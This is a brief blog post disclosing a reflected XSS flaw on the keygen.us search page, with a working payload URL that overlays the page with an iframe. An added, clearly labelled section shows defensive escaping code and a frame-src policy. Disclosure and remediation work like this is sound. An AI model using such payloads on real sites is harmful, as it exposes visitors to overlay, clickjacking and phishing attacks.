KeyGen.us users: vulnerable to XSS attacks

Keygen.us (porn free) is vulnerable to XSS attacks, which could be used against its poor users.

Example:

http://www.keygen.us/search.shtml?q=%22%3E%3Ciframe%20width="100%"%20height="100%"%20style="position:absolute;top:0;left:0"%20src=%22https://xacker.wordpress.com%22%20/%3E&w=cracks

w00ps!

Isn’t that my blog? 🙂

This is a simple demonstration; the attack vector could be extended through clickjacking and/or tabjacking techniques.
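For site owners, the fix for this class of bug is output encoding of the reflected parameter. The sketch below is an added example, not code from keygen.us or from the original post; it assumes the `q` value is echoed inside a double-quoted attribute (which the leading `">` of the payload suggests), and the function names and the `example.invalid` iframe source are made up for illustration.

```javascript
// Constructed payload with the same shape as the one in the URL above
// (iframe source replaced by a placeholder).
const payload = '"><iframe width="100%" height="100%" ' +
  'style="position:absolute;top:0;left:0" src="https://example.invalid/" />';

// Vulnerable pattern (assumed): the raw parameter is concatenated into markup,
// so a quote closes the attribute and "<iframe" starts a new element.
function renderSearchBoxUnsafe(q) {
  return '<input type="text" name="q" value="' + q + '">';
}

// Encode the characters that are significant in HTML text and quoted attributes.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened form: the parameter stays inside the attribute value as inert text.
function renderSearchBoxSafe(q) {
  return '<input type="text" name="q" value="' + escapeHtml(q) + '">';
}

// Defense in depth: even if an injection slips through, this policy stops the
// page from framing other origins, which is what the overlay iframe relies on.
function securityHeaders() {
  return { 'Content-Security-Policy': "frame-src 'self'" };
}

// Rough check: count element start tags in the rendered fragment.
function countStartTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

console.log('unsafe start tags:', countStartTags(renderSearchBoxUnsafe(payload)));
console.log('safe start tags:  ', countStartTags(renderSearchBoxSafe(payload)));
console.log(renderSearchBoxSafe(payload));
```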

Update: here is a screenshot in case they fix it 🙂

Later.
